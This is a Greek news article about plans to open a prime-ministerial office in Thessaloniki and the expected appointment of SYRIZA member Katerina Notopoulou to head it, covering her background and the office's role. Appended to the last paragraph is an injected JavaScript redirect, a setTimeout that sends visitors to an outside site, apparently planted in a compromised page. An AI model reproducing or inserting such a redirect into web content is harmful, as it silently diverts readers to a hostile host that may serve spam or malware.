Η 28χρονη που αναλαμβάνει το Γραφείο Πρωθυπουργού Β.Ελλάδας

0
25

 

Το μεγάλο γραφείο, με τα παλιά και βαριά ξύλινα έπιπλα, στα δεξιά του πρώτου ορόφου του Διοικητηρίου παραμένει πολιτικά κενό από το 2009.

Στέγαζε τον εκάστοτε γενικό γραμματέα του Υπουργείου Μακεδονίας-Θράκης και τελευταίος του ένοικος ήταν ο καθηγητής Λουκάς Ανανίκας, επί των κυβερνήσεων Κώστα Καραμανλή.

Ο Γιώργος Παπανδρέου κατήργησε το Υπουργείο και όταν ο Αντώνης Σαμαράς το σύστησε ξανά, δεν προβλέφθηκε θέση γενικού γραμματέα. Τις τελευταίες ημέρες ωστόσο παρατηρείται έντονη κινητικότητα για τη διαμόρφωσή του καθώς εκεί αναμένεται να στεγαστεί ένα νέο πολιτικό πρόσωπο και μια νέα κυβερνητική δομή.

Σύμφωνα με πληροφορίες της Εφημερίδας Θεσσαλονίκη τα επόμενα 24ωρα θα εκδοθεί το ΦΕΚ για τη δημιουργία του πρωθυπουργικού γραφείου στη Θεσσαλονίκη, κάτι το οποίο είχε ανακοινώσει για πρώτη φορά ο Αλέξης Τσίπρας σε σύσκεψη που είχε με τους τοπικούς παραγωγικούς φορείς την 1η Σεπτεμβρίου στο Μέγαρο Μαξίμου ενόψει της ΔΕΘ και επανέλαβε και από το βήμα της.

Όπως είχε πει προς τους φορείς της Βόρειας Ελλάδας θα επισκέπτεται τακτικά και ο ίδιος το γραφείο, ώστε να έχει επαφή μαζί τους ενώ θα έχει και διεθνή διάσταση καθώς θα συναντάται με ηγέτες χωρών της περιοχής. Λίγες ημέρες μετά εγκαινιάζοντας τη ΔΕΘ ο κ. Τσίπρας είχε πει: «προχωράμε στη δημιουργία παραρτήματος του Πρωθυπουργικού Γραφείου στην Θεσσαλονίκη ώστε να καταστήσουμε τη Θεσσαλονίκη πόλη-κέντρο για το σύνολο των Βαλκανίων».

Επικεφαλής του αναμένεται να τεθεί η Κατερίνα Νοτοπούλου, γνωστό στέλεχος του ΣΥΡΙΖΑ, ανήκει στη νέα γενιά του κόμματος.

Η κ. Νοτοπούλου ήταν υποψήφια βουλευτής του ΣΥΡΙΖΑ στην Α’ Θεσσαλονίκης στις εκλογές του Ιανουαρίου του 2015 και εκπρόσωπος της δημοτικής παράταξης «Ανοικτή Πόλη» του Τριαντάφυλλου Μηταφίδη την οποία στήριξε ο ΣΥΡΙΖΑ στο δήμο Θεσσαλονίκης το 2014. Επίσης δραστηριοποιείται στα κοινωνικά κινήματα και τις δομές αλληλεγγύης, με έμφαση στους πρόσφυγες και γενικότερα άτομα που έχουν πληγεί από την οικονομική κρίση. Το τελευταίο διάστημα ήταν επιστημονική συνεργάτης της Κοινοβουλευτικής Ομάδας του ΣΥΡΙΖΑ.

Στην αρχή θα στελεχωθεί με έναν πολύ μικρό αριθμό συνεργατών ενώ χαμηλό θα είναι και το κόστος λειτουργίας του. Οι αρμοδιότητες του γραφείου δεν έχουν ξεκαθαριστεί ενώ θα υπάγεται απευθείας στο Μαξίμου και ειδικά στον υπουργό Επικρατείας Χριστόφορο Βερναρδάκη.

Σύμφωνα με κυβερνητικά στελέχη, εκτός από νέες πολιτικές πρωτοβουλίες που θα αναλάβει για την περιοχή της Θεσσαλονίκης θα έχει και ευρύτερες χωρικές αρμοδιότητες ως πρωθυπουργικό γραφείο και όχι μόνο για την περιοχή. Ωστόσο θα παρακολουθεί και την εδώ εξέλιξη του κυβερνητικού έργου και θα είναι ο σύνδεσμος Μαξίμου-Θεσσαλονίκης-Βόρειας Ελλάδας. Κάτι σαν το υφυπουργείο Μακεδονίας-Θράκης δηλαδή μόνο που εκεί, δηλαδή στο κεντρικό γραφείο στα αριστερά του 1ου ορόφου του Διοικητηρίου, κατοικοεδρεύει ένα στέλεχος των ΑΝΕΛ, η υφυπουργός Μαρία Κόλλια-Τσαρουχά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here